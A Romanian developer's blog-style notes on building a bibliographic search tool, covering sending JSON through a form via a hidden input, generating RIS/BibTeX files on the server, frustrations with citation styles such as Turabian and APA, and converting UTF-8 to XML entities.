  • trimiterea JSON dintr-un form – avem un query în baza de date, rezultatele ajung ca JSON într-o variabilă JavaScript, se pune problema folosirii acesteia pentru a genera local și oferi spre descărcare o filă (RIS, BibTeX…). Din cauza numeroaselor limitări din felul în care browserele tratează JavaScript, dar și a faptului că soluția găsită (Downloadify) este dependentă de Flash 10, am renunțat la ideea generării locale a filei. Trebuia însă folosit JSON-ul deja generat. Problema e că trimiterea din form a JSON-ului ca obiect face ca serverul să primească, evident, un [Object] inutil. A fost nevoie, oricât de zgârcit aș fi, de trimiterea JSON-ului în dublu exemplar: ca obiect JavaScript, utilizat pentru afișarea în diferitele formate de citare, și ca text, utilizat ca valoare a unui hidden input pentru generarea pe server a filelor RIS/BibTeX;
  • formate de citare – când mi-am scris lucrarea de licență nu aveam idee despre cât de complicată e lumea asta a referințelor academice. În lipsa unor instrucțiuni clare și bine structurate din partea facultății, am imitat stilul de citare găsit în cărți și am crezut că e bine așa. Cât de mult mă înșelam… Fiind nevoit să afișez citările în formate diferite, am parcurs instrucțiunile din câteva manuale de stil. În Occident parcă e o întrecere în privința stilurilor de citare, care mai de care mai încâlcite și pretențioase. Sunt sute de stiluri pentru afișarea unui set relativ restrâns de date (ex. autori, titlu, an, publicație…). Am întâlnit felurite mofturi ridicole – ex. în minunatul stil Turabian (de fapt, Chicago cu variațiuni) numele primului autor e scris inversat (Nume, Prenume), dar restul numelor de autori sunt enumerate în ordinea obișnuită (Prenume Nume; mulțumim, Kate Turabian!); în stilul APA, acolo unde sunt peste șapte autori, sunt enumerați primii șase, se adaugă „. . .” și apoi ultimul autor (dacă o lucrare are opt autori, cel de-al șaptelea e un ghinionist pentru că numele lui e înlocuit cu „. . .”). Am mai auzit și de mofturi de-a dreptul revoltătoare din folclorul academic autohton – ex. prenumele autoarelor s-ar scrie complet, pe când prenumele autorilor ar fi reprezentat prin inițială.
    Noroc cu formatele text de tip RIS/BibTeX. Datele lor pot fi importate în aplicații precum Zotero și apoi afișate într-o mulțime de stiluri, fără ca utilizatorul să fie nevoit să știe reguli aberante;
  • conversie UTF-8 în entities – am găsit o excelentă soluție, utilă pentru encodarea caracterelor UTF-8 în XML.